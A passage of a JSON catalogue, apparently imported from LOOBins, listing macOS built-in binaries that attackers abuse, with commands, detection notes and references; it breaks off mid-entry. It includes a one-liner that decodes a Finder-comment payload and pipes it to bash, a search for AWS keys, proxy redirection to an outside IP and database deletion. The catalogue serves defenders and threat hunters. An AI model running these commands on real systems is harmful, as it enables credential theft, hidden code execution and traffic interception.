publishing"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/lsregister.yml","https://www.jamf.com/blog/remote-mac-exploitation-via-custom-url-schemes/","https://book.hacktricks.xyz/macos-hardening/macos-security-and-privilege-escalation"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:lsregister:352322721f01970b","toolId":"loobins:lsregister","toolName":"lsregister","name":"Get a list of apps and their bindings","source":"LOOBins","platform":["macOS"],"capability":["Discovery"],"nativeCategory":["Discovery"],"command":"/System/Library/Frameworks/CoreServices.framework/Versions/A/Frameworks/LaunchServices.framework/Versions/A/Support/lsregister -dump | grep -E \"path:|bindings:|name: | more\"","description":"The -dump flag can be used to get a list of apps and their bindings","mitre":[],"fullPath":["/System/Library/Frameworks/CoreServices.framework/Versions/A/Frameworks/LaunchServices.framework/Versions/A/Support/lsregister"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"No detections at time of publishing","value":"No detections at time of publishing"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/lsregister.yml","https://www.jamf.com/blog/remote-mac-exploitation-via-custom-url-schemes/","https://book.hacktricks.xyz/macos-hardening/macos-security-and-privilege-escalation"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:lsregister:4e2159119984afaf","toolId":"loobins:lsregister","toolName":"lsregister","name":"Delete the Launch Services database","source":"LOOBins","platform":["macOS"],"capability":[],"nativeCategory":["Impact"],"command":"lsregister -delete","description":"The -delete flag can be used to delete the Launch Services database to impact normal operation of the system.","mitre":[],"fullPath":["/System/Library/Frameworks/CoreServices.framework/Versions/A/Frameworks/LaunchServices.framework/Versions/A/Support/lsregister"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"No detections at time of publishing","value":"No detections at time of publishing"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/lsregister.yml","https://www.jamf.com/blog/remote-mac-exploitation-via-custom-url-schemes/","https://book.hacktricks.xyz/macos-hardening/macos-security-and-privilege-escalation"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:mdfind:c996ea826308e08e","toolId":"loobins:mdfind","toolName":"mdfind","name":"Use mdfind to provide live updates to the number of files matching the query","source":"LOOBins","platform":["macOS"],"capability":["Discovery"],"nativeCategory":["Reconnaissance","Discovery"],"command":"mdfind -live passw","description":"A bash or zsh oneliner can cause mdfind to provide an attacker with live updates to the number of files on a system.","mitre":[],"fullPath":["/usr/bin/mdfind"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"Jamf Protect: Detect activity related to mdfind used to search for stored AWS keys","value":"https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/mdfind_search_aws_keys"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/mdfind.yml","https://youtu.be/Snwh4mMe-Cg?t=45","https://www.jamf.com/blog/zero-day-tcc-bypass-discovered-in-xcsset-malware/"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:mdfind:2db1dd9877d58c35","toolId":"loobins:mdfind","toolName":"mdfind","name":"Use mdfind to search for AWS Keys","source":"LOOBins","platform":["macOS"],"capability":["Discovery"],"nativeCategory":["Reconnaissance","Discovery"],"command":"mdfind 'kMDItemTextContext == AKIA || kMDItemDisplayName = *AKIA* -onlyin ~'","description":"Allows an attacker to query the filesystem via the CommandLine/Terminal to search for AWS keys.","mitre":[],"fullPath":["/usr/bin/mdfind"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"Jamf Protect: Detect activity related to mdfind used to search for stored AWS keys","value":"https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/mdfind_search_aws_keys"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/mdfind.yml","https://youtu.be/Snwh4mMe-Cg?t=45","https://www.jamf.com/blog/zero-day-tcc-bypass-discovered-in-xcsset-malware/"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:mdfind:8bd2fd8338c96e64","toolId":"loobins:mdfind","toolName":"mdfind","name":"Use mdfind to search for apps to infect","source":"LOOBins","platform":["macOS"],"capability":["Discovery","Defense Evasion"],"nativeCategory":["Reconnaissance","Discovery","Defense Evasion"],"command":"set appId to do shell script \"mdfind kMDItemCFBundleIdentifier = '\" & bundleId & \"'\"","description":"Allows an attacker to determine if specific applications are installed and can be leveraged","mitre":[],"fullPath":["/usr/bin/mdfind"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"Jamf Protect: Detect activity related to mdfind used to search for stored AWS keys","value":"https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/mdfind_search_aws_keys"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/mdfind.yml","https://youtu.be/Snwh4mMe-Cg?t=45","https://www.jamf.com/blog/zero-day-tcc-bypass-discovered-in-xcsset-malware/"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:mdls:097a7a7a4f0a3991","toolId":"loobins:mdls","toolName":"mdls","name":"Validate file download information","source":"LOOBins","platform":["macOS"],"capability":["Defense Evasion"],"nativeCategory":["Defense Evasion"],"command":"mdls -name \"kMDItemWhereFroms\" -name \"kMDItemDownloadedDate\"","description":"Use mdls to validate payload download sources and timestamps to guard against sandbox executions.","mitre":[],"fullPath":["/usr/bin/mdls"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"No detections at time of publishing","value":"No detections at time of publishing"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/mdls.yml","https://blog.talosintelligence.com/bad-apples-weaponizing-native-macos-primitives-for-movement-and-execution/"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:mdls:518fce6d16797638","toolId":"loobins:mdls","toolName":"mdls","name":"Query File Paths","source":"LOOBins","platform":["macOS"],"capability":["Discovery"],"nativeCategory":["Discovery"],"command":"xargs -0 mdls -n kMDItemPath -n kMDItemFSSize","description":"Use mdls to print file paths and sizes when enumerating host resources.","mitre":[],"fullPath":["/usr/bin/mdls"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"No detections at time of publishing","value":"No detections at time of publishing"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/mdls.yml","https://blog.talosintelligence.com/bad-apples-weaponizing-native-macos-primitives-for-movement-and-execution/"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:mdls:c7bc602e81ff2077","toolId":"loobins:mdls","toolName":"mdls","name":"Extract and execute payload stored in Finder comment metadata","source":"LOOBins","platform":["macOS"],"capability":["Execution","Collection","Defense Evasion"],"nativeCategory":["Execution","Collection","Defense Evasion"],"command":"mdls -name kMDItemFinderComment -raw ~/Desktop/payload_carrier.txt | base64 -D | bash","description":"Every file on macOS has a Finder comment field stored as Spotlight metadata under the kMDItemFinderComment attribute. mdls can read this field and pipe its contents to a decoder and executor. Because the payload lives entirely in Spotlight metadata rather than file contents, it is not visible to file-based inspection or integrity monitoring tools. Finder comments can be written remotely via osascript over Remote Apple Events or SSH, making this a covert staging mechanism for lateral movement payloads.","mitre":[],"fullPath":["/usr/bin/mdls"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"No detections at time of publishing","value":"No detections at time of publishing"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/mdls.yml","https://blog.talosintelligence.com/bad-apples-weaponizing-native-macos-primitives-for-movement-and-execution/"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:mktemp:8ae26ff6d9e798ad","toolId":"loobins:mktemp","toolName":"mktemp","name":"Generate payload directory (Shlayer)","source":"LOOBins","platform":["macOS"],"capability":["Defense Evasion"],"nativeCategory":["Defense Evasion"],"command":"export tmpDir=\"$(mktemp -d /tmp/XXXXXXXXXXXX)\"","description":"The following command can be used to generate a random directory name for staging payloads","mitre":[],"fullPath":["/usr/bin/mktemp"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"No detections at time of publishing","value":"No detections at time of publishing"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/mktemp.yml","https://www.jamf.com/blog/shlayer-malware-abusing-gatekeeper-bypass-on-macos/","https://www.sentinelone.com/labs/20-common-tools-techniques-used-by-macos-threat-actors-malware/"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:mktemp:adcbf3c728bcf6f7","toolId":"loobins:mktemp","toolName":"mktemp","name":"Generate directory based on template file (Bundlore)","source":"LOOBins","platform":["macOS"],"capability":["Defense Evasion"],"nativeCategory":["Defense Evasion"],"command":"TMP_DIR=\"mktemp -d -t x\"","description":"The following command can be used to generate a unique directory based on a template","mitre":[],"fullPath":["/usr/bin/mktemp"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"No detections at time of publishing","value":"No detections at time of publishing"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/mktemp.yml","https://www.jamf.com/blog/shlayer-malware-abusing-gatekeeper-bypass-on-macos/","https://www.sentinelone.com/labs/20-common-tools-techniques-used-by-macos-threat-actors-malware/"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:networksetup:41bd049d11be4aa4","toolId":"loobins:networksetup","toolName":"networksetup","name":"network device enumeration","source":"LOOBins","platform":["macOS"],"capability":["Discovery"],"nativeCategory":["Discovery"],"command":"networksetup -listnetworkserviceorder","description":"Use networksetup to display services with corresponding port and device in order they are tried for connecting to a network.","mitre":[],"fullPath":["/usr/sbin/networksetup"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"No detections at time of publishing","value":"No detections at time of publishing"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/networksetup.yml","https://megancarney.com/presentations/ExternalReport_ThreatHuntingMacOS.pdf","https://www.youtube.com/watch?v=_K4gnSuDkRM&feature=youtu.be","https://objective-see.org/blog/blog_0x25.html","https://objective-see.org/blog/blog_0x26.html","https://objective-see.org/blog/blog_0x6D.html","https://objective-see.org/blog/blog_0x3C.html","https://objective-see.org/blog/blog_0x6E.html"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:networksetup:f68761716a8e9334","toolId":"loobins:networksetup","toolName":"networksetup","name":"Detect connected network hardware","source":"LOOBins","platform":["macOS"],"capability":["Discovery"],"nativeCategory":["Discovery"],"command":"networksetup -detectnewhardware","description":"Use networksetup to detect new network hardware and create a default network service on the hardware.","mitre":[],"fullPath":["/usr/sbin/networksetup"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"No detections at time of publishing","value":"No detections at time of publishing"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/networksetup.yml","https://megancarney.com/presentations/ExternalReport_ThreatHuntingMacOS.pdf","https://www.youtube.com/watch?v=_K4gnSuDkRM&feature=youtu.be","https://objective-see.org/blog/blog_0x25.html","https://objective-see.org/blog/blog_0x26.html","https://objective-see.org/blog/blog_0x6D.html","https://objective-see.org/blog/blog_0x3C.html","https://objective-see.org/blog/blog_0x6E.html"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:networksetup:fd6b13ad5483ff20","toolId":"loobins:networksetup","toolName":"networksetup","name":"network device enumeration","source":"LOOBins","platform":["macOS"],"capability":["Discovery"],"nativeCategory":["Discovery"],"command":"networksetup -listallhardwareports","description":"Use networksetup to list all network interfaces, providing name, device name, MAC address.","mitre":[],"fullPath":["/usr/sbin/networksetup"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"No detections at time of publishing","value":"No detections at time of publishing"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/networksetup.yml","https://megancarney.com/presentations/ExternalReport_ThreatHuntingMacOS.pdf","https://www.youtube.com/watch?v=_K4gnSuDkRM&feature=youtu.be","https://objective-see.org/blog/blog_0x25.html","https://objective-see.org/blog/blog_0x26.html","https://objective-see.org/blog/blog_0x6D.html","https://objective-see.org/blog/blog_0x3C.html","https://objective-see.org/blog/blog_0x6E.html"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:networksetup:168eb6a8aa332846","toolId":"loobins:networksetup","toolName":"networksetup","name":"network device enumeration","source":"LOOBins","platform":["macOS"],"capability":["Discovery"],"nativeCategory":["Discovery"],"command":"networksetup -listallnetworkservices","description":"Use networksetup to list all network interface names.","mitre":[],"fullPath":["/usr/sbin/networksetup"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"No detections at time of publishing","value":"No detections at time of publishing"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/networksetup.yml","https://megancarney.com/presentations/ExternalReport_ThreatHuntingMacOS.pdf","https://www.youtube.com/watch?v=_K4gnSuDkRM&feature=youtu.be","https://objective-see.org/blog/blog_0x25.html","https://objective-see.org/blog/blog_0x26.html","https://objective-see.org/blog/blog_0x6D.html","https://objective-see.org/blog/blog_0x3C.html","https://objective-see.org/blog/blog_0x6E.html"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:networksetup:5dbb2383ccf4021d","toolId":"loobins:networksetup","toolName":"networksetup","name":"DNS server enumeration","source":"LOOBins","platform":["macOS"],"capability":["Discovery"],"nativeCategory":["Discovery"],"command":"networksetup -getdnsservers Wi-Fi","description":"Use networksetup to get configured DNS servers for a specific interface.","mitre":[],"fullPath":["/usr/sbin/networksetup"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"No detections at time of publishing","value":"No detections at time of publishing"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/networksetup.yml","https://megancarney.com/presentations/ExternalReport_ThreatHuntingMacOS.pdf","https://www.youtube.com/watch?v=_K4gnSuDkRM&feature=youtu.be","https://objective-see.org/blog/blog_0x25.html","https://objective-see.org/blog/blog_0x26.html","https://objective-see.org/blog/blog_0x6D.html","https://objective-see.org/blog/blog_0x3C.html","https://objective-see.org/blog/blog_0x6E.html"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:networksetup:7fbf514f694271c4","toolId":"loobins:networksetup","toolName":"networksetup","name":"Enumerate configured web proxy URL for an interface","source":"LOOBins","platform":["macOS"],"capability":["Discovery"],"nativeCategory":["Discovery"],"command":"networksetup -getautoproxyurl \"Thunderbolt Ethernet\"","description":"Displays web proxy auto-configuration information for the specified interface.","mitre":[],"fullPath":["/usr/sbin/networksetup"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"No detections at time of publishing","value":"No detections at time of publishing"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/networksetup.yml","https://megancarney.com/presentations/ExternalReport_ThreatHuntingMacOS.pdf","https://www.youtube.com/watch?v=_K4gnSuDkRM&feature=youtu.be","https://objective-see.org/blog/blog_0x25.html","https://objective-see.org/blog/blog_0x26.html","https://objective-see.org/blog/blog_0x6D.html","https://objective-see.org/blog/blog_0x3C.html","https://objective-see.org/blog/blog_0x6E.html"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:networksetup:e8c626b275630b8f","toolId":"loobins:networksetup","toolName":"networksetup","name":"Enumerate configured web proxy for an interface","source":"LOOBins","platform":["macOS"],"capability":["Discovery"],"nativeCategory":["Discovery"],"command":"networksetup -getwebproxy \"Wi-Fi\"","description":"Displays standard web proxy information for the specified interface.","mitre":[],"fullPath":["/usr/sbin/networksetup"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"No detections at time of publishing","value":"No detections at time of publishing"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/networksetup.yml","https://megancarney.com/presentations/ExternalReport_ThreatHuntingMacOS.pdf","https://www.youtube.com/watch?v=_K4gnSuDkRM&feature=youtu.be","https://objective-see.org/blog/blog_0x25.html","https://objective-see.org/blog/blog_0x26.html","https://objective-see.org/blog/blog_0x6D.html","https://objective-see.org/blog/blog_0x3C.html","https://objective-see.org/blog/blog_0x6E.html"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:networksetup:f00af425358c2200","toolId":"loobins:networksetup","toolName":"networksetup","name":"Set the https web proxy for an interface","source":"LOOBins","platform":["macOS"],"capability":[],"nativeCategory":["Command and Control"],"command":"networksetup -setsecurewebproxy \"Wi-Fi\" 46.226.108.171","description":"Use networksetup to set the https web proxy for an interface.","mitre":[],"fullPath":["/usr/sbin/networksetup"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"No detections at time of publishing","value":"No detections at time of publishing"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/networksetup.yml","https://megancarney.com/presentations/ExternalReport_ThreatHuntingMacOS.pdf","https://www.youtube.com/watch?v=_K4gnSuDkRM&feature=youtu.be","https://objective-see.org/blog/blog_0x25.html","https://objective-see.org/blog/blog_0x26.html","https://objective-see.org/blog/blog_0x6D.html","https://objective-see.org/blog/blog_0x3C.html","https://objective-see.org/blog/blog_0x6E.html"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:networksetup:7010ec9c106f3c12","toolId":"loobins:networksetup","toolName":"networksetup","name":"Set the http web proxy for an interface","source":"LOOBins","platform":["macOS"],"capability":[],"nativeCategory":["Command and Control"],"command":"networksetup -setwebproxy \"Wi-Fi\" 46.226.108.171","description":"Use networksetup to set the http web proxy for an interface.","mitre":[],"fullPath":["/usr/sbin/networksetup"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"No detections at time of publishing","value":"No detections at time of publishing"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/networksetup.yml","https://megancarney.com/presentations/ExternalReport_ThreatHuntingMacOS.pdf","https://www.youtube.com/watch?v=_K4gnSuDkRM&feature=youtu.be","https://objective-see.org/blog/blog_0x25.html","https://objective-see.org/blog/blog_0x26.html","https://objective-see.org/blog/blog_0x6D.html","https://objective-see.org/blog/blog_0x3C.html","https://objective-see.org/blog/blog_0x6E.html"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:networksetup:4a75ab18d02eb5be","toolId":"loobins:networksetup","toolName":"networksetup","name":"Set auto proxy URL for an interface","source":"LOOBins","platform":["macOS"],"capability":[],"nativeCategory":["Command and Control"],"command":"networksetup -setautoproxyurl \"Wi-Fi\" $autoProxyURL","description":"Use networksetup to set the proxy URL for an interface.","mitre":[],"fullPath":["/usr/sbin/networksetup"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"No detections at time of publishing","value":"No detections at time of publishing"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/networksetup.yml","https://megancarney.com/presentations/ExternalReport_ThreatHuntingMacOS.pdf","https://www.youtube.com/watch?v=_K4gnSuDkRM&feature=youtu.be","https://objective-see.org/blog/blog_0x25.html","https://objective-see.org/blog/blog_0x26.html","https://objective-see.org/blog/blog_0x6D.html","https://objective-see.org/blog/blog_0x3C.html","https://objective-see.org/blog/blog_0x6E.html"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:networksetup:0365fc892ea9ebd8","toolId":"loobins:networksetup","toolName":"networksetup","name":"Enable auto proxy state","source":"LOOBins","platform":["macOS"],"capability":[],"nativeCategory":["Command and Control"],"command":"networksetup -setautoproxystate \"Wi-Fi\" on","description":"Use networksetup to enable the proxy auto-config","mitre":[],"fullPath":["/usr/sbin/networksetup"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"No detections at time of publishing","value":"No detections at time of publishing"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/networksetup.yml","https://megancarney.com/presentations/ExternalReport_ThreatHuntingMacOS.pdf","https://www.youtube.com/watch?v=_K4gnSuDkRM&feature=youtu.be","https://objective-see.org/blog/blog_0x25.html","https://objective-see.org/blog/blog_0x26.html","https://objective-see.org/blog/blog_0x6D.html","https://objective-see.org/blog/blog_0x3C.html","https://objective-see.org/blog/blog_0x6E.html"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:notifyutil:a49f967a5200e4d3","toolId":"loobins:notifyutil","toolName":"notifyutil","name":"Monitor system events for reconnaissance","source":"LOOBins","platform":["macOS"],"capability":["Discovery","Collection"],"nativeCategory":["Discovery","Collection"],"command":"notifyutil -w com.apple.screenIsLocked","description":"An attacker can register for system notification keys to detect when the user locks their screen, changes network state, or other system events without using more easily detected APIs. The following example monitors for screen lock events.","mitre":[],"fullPath":["/usr/bin/notifyutil"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"Monitor notifyutil execution with suspicious notification keys","value":"Monitor notifyutil execution with suspicious notification keys"},{"type":"Detect notifyutil monitoring non-standard or custom notification keys (keys not starting with com.apple)","value":"Detect notifyutil monitoring non-standard or custom notification keys (keys not starting with com.apple)"},{"type":"Monitor long-running notifyutil processes (using -w flag for sustained monitoring)","value":"Monitor long-running notifyutil processes (using -w flag for sustained monitoring)"},{"type":"Detect notifyutil usage in conjunction with known malware indicators or suspicious parent processes","value":"Detect notifyutil usage in conjunction with known malware indicators or suspicious parent processes"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/notifyutil.yml","https://brettterpstra.com/2012/07/04/quick-tip-system-wide-notifications-with-notifyutil/","https://developer.apple.com/library/archive/documentation/Darwin/Conceptual/MacOSXNotifcationOv/DarwinNotificationConcepts/DarwinNotificationConcepts.html","https://developer.apple.com/library/archive/documentation/System/Conceptual/ManPages_iPhoneOS/man3/notify.3.html"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:notifyutil:891e0dc874fbdd11","toolId":"loobins:notifyutil","toolName":"notifyutil","name":"Establish covert inter-process communication channel","source":"LOOBins","platform":["macOS"],"capability":["Defense Evasion"],"nativeCategory":["Command and Control","Defense Evasion"],"command":"# Sender process\nnotifyutil -p com.example.hidden.channel -s com.example.hidden.channel 1337\n\n# Receiver process in another terminal/process\nnotifyutil -1 com.example.hidden.channel -g com.example.hidden.channel","description":"Threat actors can use Darwin notifications as a covert IPC mechanism to coordinate between malicious processes. By posting and monitoring custom notification keys with associated state values, malware components can exchange commands and data without using traditional IPC methods that may be monitored.","mitre":[],"fullPath":["/usr/bin/notifyutil"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"Monitor notifyutil execution with suspicious notification keys","value":"Monitor notifyutil execution with suspicious notification keys"},{"type":"Detect notifyutil monitoring non-standard or custom notification keys (keys not starting with com.apple)","value":"Detect notifyutil monitoring non-standard or custom notification keys (keys not starting with com.apple)"},{"type":"Monitor long-running notifyutil processes (using -w flag for sustained monitoring)","value":"Monitor long-running notifyutil processes (using -w flag for sustained monitoring)"},{"type":"Detect notifyutil usage in conjunction with known malware indicators or suspicious parent processes","value":"Detect notifyutil usage in conjunction with known malware indicators or suspicious parent processes"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/notifyutil.yml","https://brettterpstra.com/2012/07/04/quick-tip-system-wide-notifications-with-notifyutil/","https://developer.apple.com/library/archive/documentation/Darwin/Conceptual/MacOSXNotifcationOv/DarwinNotificationConcepts/DarwinNotificationConcepts.html","https://developer.apple.com/library/archive/documentation/System/Conceptual/ManPages_iPhoneOS/man3/notify.3.html"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:notifyutil:45163e0090184fa4","toolId":"loobins:notifyutil","toolName":"notifyutil","name":"Monitor network state changes for data exfiltration timing","source":"LOOBins","platform":["macOS"],"capability":["Discovery","Collection"],"nativeCategory":["Discovery","Collection"],"command":"notifyutil -w com.apple.system.config.network_change","description":"An attacker can monitor for network configuration changes to determine optimal timing for data exfiltration. This allows malware to detect when the system connects to networks and adjust behavior accordingly.","mitre":[],"fullPath":["/usr/bin/notifyutil"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"Monitor notifyutil execution with suspicious notification keys","value":"Monitor notifyutil execution with suspicious notification keys"},{"type":"Detect notifyutil monitoring non-standard or custom notification keys (keys not starting with com.apple)","value":"Detect notifyutil monitoring non-standard or custom notification keys (keys not starting with com.apple)"},{"type":"Monitor long-running notifyutil processes (using -w flag for sustained monitoring)","value":"Monitor long-running notifyutil processes (using -w flag for sustained monitoring)"},{"type":"Detect notifyutil usage in conjunction with known malware indicators or suspicious parent processes","value":"Detect notifyutil usage in conjunction with known malware indicators or suspicious parent processes"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/notifyutil.yml","https://brettterpstra.com/2012/07/04/quick-tip-system-wide-notifications-with-notifyutil/","https://developer.apple.com/library/archive/documentation/Darwin/Conceptual/MacOSXNotifcationOv/DarwinNotificationConcepts/DarwinNotificationConcepts.html","https://developer.apple.com/library/archive/documentation/System/Conceptual/ManPages_iPhoneOS/man3/notify.3.html"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:notifyutil:687e08d3b386a66e","toolId":"loobins:notifyutil","toolName":"notifyutil","name":"Monitor timezone changes for geolocation tracking","source":"LOOBins","platform":["macOS"],"capability":["Collection","Discovery"],"nativeCategory":["Collection","Discovery"],"command":"notifyutil -w com.apple.system.timezone","description":"Monitoring timezone change notifications can help an attacker track when a target device moves between geographic locations or when users travel, providing intelligence about the target's physical location and movement patterns.","mitre":[],"fullPath":["/usr/bin/notifyutil"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"Monitor notifyutil execution with suspicious notification keys","value":"Monitor notifyutil execution with suspicious notification keys"},{"type":"Detect notifyutil monitoring non-standard or custom notification keys (keys not starting with com.apple)","value":"Detect notifyutil monitoring non-standard or custom notification keys (keys not starting with com.apple)"},{"type":"Monitor long-running notifyutil processes (using -w flag for sustained monitoring)","value":"Monitor long-running notifyutil processes (using -w flag for sustained monitoring)"},{"type":"Detect notifyutil usage in conjunction with known malware indicators or suspicious parent processes","value":"Detect notifyutil usage in conjunction with known malware indicators or suspicious parent 